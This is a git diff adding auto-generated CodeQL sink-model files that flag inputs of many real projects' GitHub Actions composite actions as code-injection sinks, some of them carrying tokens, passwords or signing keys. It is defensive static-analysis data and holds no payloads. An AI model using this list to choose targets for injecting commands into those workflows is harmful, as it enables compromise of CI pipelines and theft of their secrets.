diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml new file mode 100644 index 000000000000..ce3ed699b9ab --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["amazon-ion/ion-java", "*", "inputs.project_version", "code-injection", "generated"] + - ["amazon-ion/ion-java", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml new file mode 100644 index 000000000000..8b62fe8e0aad --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["anchore/grype", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml new file mode 100644 index 000000000000..946faca35c93 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["anchore/syft", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml new file mode 100644 index 000000000000..b68c9462c1bb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["angular/dev-infra", "*", "inputs.firebase-public-dir", "code-injection", "generated"] + - ["angular/dev-infra", "*", "inputs.workflow-artifact-name", "code-injection", "generated"] + - ["angular/dev-infra", "*", "inputs.artifact-build-revision", "code-injection", "generated"] + - ["angular/dev-infra", "*", "inputs.pull-number", "code-injection", "generated"] + - ["angular/dev-infra", "*", "inputs.deploy-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml new file mode 100644 index 000000000000..aedefc9ee02b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ansible/ansible-lint", "*", "inputs.args", "code-injection", "generated"] + - ["ansible/ansible-lint", "*", "inputs.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml new file mode 100644 index 000000000000..36f7a18e1989 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ansible/awx", "*", "inputs.log-filename", "code-injection", "generated"] + - ["ansible/awx", "*", "inputs.github-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml new file mode 100644 index 000000000000..a1d324f44bdf 
--- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/arrow-datafusion", "*", "inputs.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml new file mode 100644 index 000000000000..53142801fecd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/arrow-rs", "*", "inputs.target", "code-injection", "generated"] + - ["apache/arrow-rs", "*", "inputs.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml new file mode 100644 index 000000000000..5170beb3a7aa --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/arrow", "*", "inputs.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml new file mode 100644 index 000000000000..1fabdd9085b2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/bookkeeper", "*", "inputs.mode", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml new file mode 100644 index 000000000000..370d3c6954ee --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/brpc", "*", "inputs.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml new file mode 100644 index 000000000000..ac0156b719fb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/camel-k", "*", "inputs.test-suite", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-version", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-registry-insecure", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-registry-host", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.catalog-source-namespace", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.catalog-source-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-namespace", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.version", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.otlp-collector-image-version", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.otlp-collector-image-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.global-operator-namespace", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml new file mode 100644 index 000000000000..9ee197ed8848 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/camel", "*", "inputs.end-commit", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.start-commit", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.distribution", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.version", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.pr-id", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml new file mode 100644 index 000000000000..99a1e4cec710 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/flink", "*", "inputs.maven-parameters", "code-injection", "generated"] + - ["apache/flink", "*", "inputs.env", "code-injection", "generated"] + - ["apache/flink", "*", "inputs.target_directory", "code-injection", "generated"] + - ["apache/flink", "*", "inputs.source_directory", "code-injection", "generated"] + - ["apache/flink", "*", "inputs.jdk_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml new file mode 100644 index 000000000000..d2a6dbd4929e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/nuttx", "*", "inputs.haskell", "code-injection", "generated"] + - ["apache/nuttx", "*", "inputs.dotnet", "code-injection", "generated"] + - ["apache/nuttx", "*", "inputs.android", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml new file mode 100644 index 000000000000..13a9ff475b92 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/opendal", "*", "inputs.feature", "code-injection", "generated"] + - ["apache/opendal", "*", "inputs.setup", "code-injection", "generated"] + - ["apache/opendal", "*", "inputs.service", "code-injection", "generated"] + - ["apache/opendal", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml new file mode 100644 index 000000000000..a173154bec07 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/pekko", "*", "inputs.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml new file mode 100644 index 000000000000..f7a5017d2fb5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml 
@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/pulsar-helm-chart", "*", "inputs.limit-access-to-users", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.limit-access-to-actor", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.secure-access", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.action", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.yamale_version", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.yamllint_version", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml new file mode 100644 index 000000000000..1bcf118810ff --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/superset", "*", "inputs.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml new file mode 100644 index 000000000000..fb210d5af55c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["appflowy-io/appflowy", "*", "inputs.test_path", "code-injection", "generated"] + - ["appflowy-io/appflowy", "*", "inputs.flutter_profile", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml new file mode 100644 index 000000000000..77554b9872e3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aptos-labs/aptos-core", "*", "inputs.GIT_CREDENTIALS", "code-injection", "generated"] + - ["aptos-labs/aptos-core", "*", "inputs.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] + - ["aptos-labs/aptos-core", "*", "inputs.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml new file mode 100644 index 000000000000..7fc1eaaca483 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["archivesspace/archivesspace", "*", "inputs.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml new file mode 100644 index 000000000000..921095f8a380 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["armadaproject/armada", "*", "inputs.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml new file mode 100644 index 000000000000..e8dba39c742c 
--- /dev/null +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["armbian/build", "*", "inputs.armbian_pgp_password", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_extensions", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_release", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_kernel_branch", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_board", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_target", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_branch", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_ui", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml new file mode 100644 index 000000000000..69970d3419b2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["auth0/auth0-java", "*", "inputs.signing-password", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "inputs.signing-key", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "inputs.ossr-password", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "inputs.ossr-username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml new file mode 100644 index 000000000000..b57797cc643c --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["auth0/auth0.net", "*", "inputs.nuget-token", "code-injection", "generated"] + - ["auth0/auth0.net", "*", "inputs.nuget-directory", "code-injection", "generated"] + - ["auth0/auth0.net", "*", "inputs.project-paths", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml new file mode 100644 index 000000000000..08b65cea6d72 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["auth0/auth0.swift", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml new file mode 100644 index 000000000000..453e60f3595e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["autogluon/autogluon", "*", "inputs.submodule-to-test", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "inputs.command", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "inputs.work-dir", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "inputs.job-name", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "inputs.job-type", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml new file mode 100644 index 000000000000..012802b80063 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["avaiga/taipy", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml new file mode 100644 index 000000000000..a397a77f6dc1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aws-amplify/amplify-cli", "*", "inputs.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml new file mode 100644 index 000000000000..15de610c9812 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aws/amazon-vpc-cni-k8s", "*", "inputs.go-package", "code-injection", "generated"] + - ["aws/amazon-vpc-cni-k8s", "*", "inputs.work-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml new file mode 100644 index 000000000000..ad6e7e806cd0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aws/karpenter-provider-aws", "*", "inputs.account_id", "code-injection", "generated"] + - ["aws/karpenter-provider-aws", "*", "inputs.cluster_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml new file mode 100644 index 000000000000..67631102d71f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["awslabs/amazon-eks-ami", "*", "inputs.max_resource_age_duration", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.aws_region", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.ami_id", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.k8s_version", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.os_distro", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.additional_arguments", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.build_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml new file mode 100644 index 000000000000..098d7c139fa5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["awslabs/aws-lambda-rust-runtime", "*", "inputs.package", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml new file mode 100644 index 000000000000..def12e487410 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azerothcore/azerothcore-wotlk", "*", "inputs.CXX", "code-injection", "generated"] + - ["azerothcore/azerothcore-wotlk", "*", "inputs.CC", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml new file mode 100644 index 000000000000..768db7317cc3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azure/azure-datafactory", "*", "inputs.directory", "code-injection", "generated"] + - ["azure/azure-datafactory", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml new file mode 100644 index 000000000000..55218009c022 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["badges/shields", "*", "inputs.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml new file mode 100644 index 000000000000..17ec5471e85c --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["balena-io/etcher", "*", "inputs.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml new file mode 100644 index 000000000000..55cd8b18241d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["balena-os/balena-engine", "*", "inputs.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml new file mode 100644 index 000000000000..328d58d9e42b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ben-manes/caffeine", "*", "inputs.attempt-delay", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "inputs.attempt-limit", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "inputs.arguments", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "inputs.graal", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "inputs.java", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml new file mode 100644 index 000000000000..836bda1041ad --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bokeh/bokeh", "*", "inputs.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml new file mode 100644 index 000000000000..b6f9ee027f1f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["botpress/botpress", "*", "inputs.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml new file mode 100644 index 000000000000..2f6458219b62 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["braintree/braintree-android-drop-in", "*", "inputs.version", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "inputs.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "inputs.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml new file mode 100644 index 000000000000..374a13ccd82d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["braintree/braintree/android", "*", "inputs.version", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "inputs.module", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "inputs.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "inputs.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml new file mode 100644 index 000000000000..fb4608ec70be --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["broadinstitute/gatk", "*", "inputs.identifier", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "inputs.repo-path", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "inputs.CROMWELL_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml new file mode 100644 index 000000000000..3a6a4575d304 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["canonical/multipass", "*", "inputs.release-tag-re", "code-injection", "generated"] + - ["canonical/multipass", "*", "inputs.release-branch-re", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml new file mode 100644 index 000000000000..d21c609e5eda --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chia-network/actions", "*", "inputs.keypair_path", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.role_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.backend_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.vault_url", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.ttl", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.vault_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml new file mode 100644 index 000000000000..76c92f51d267 --- /dev/null +++ 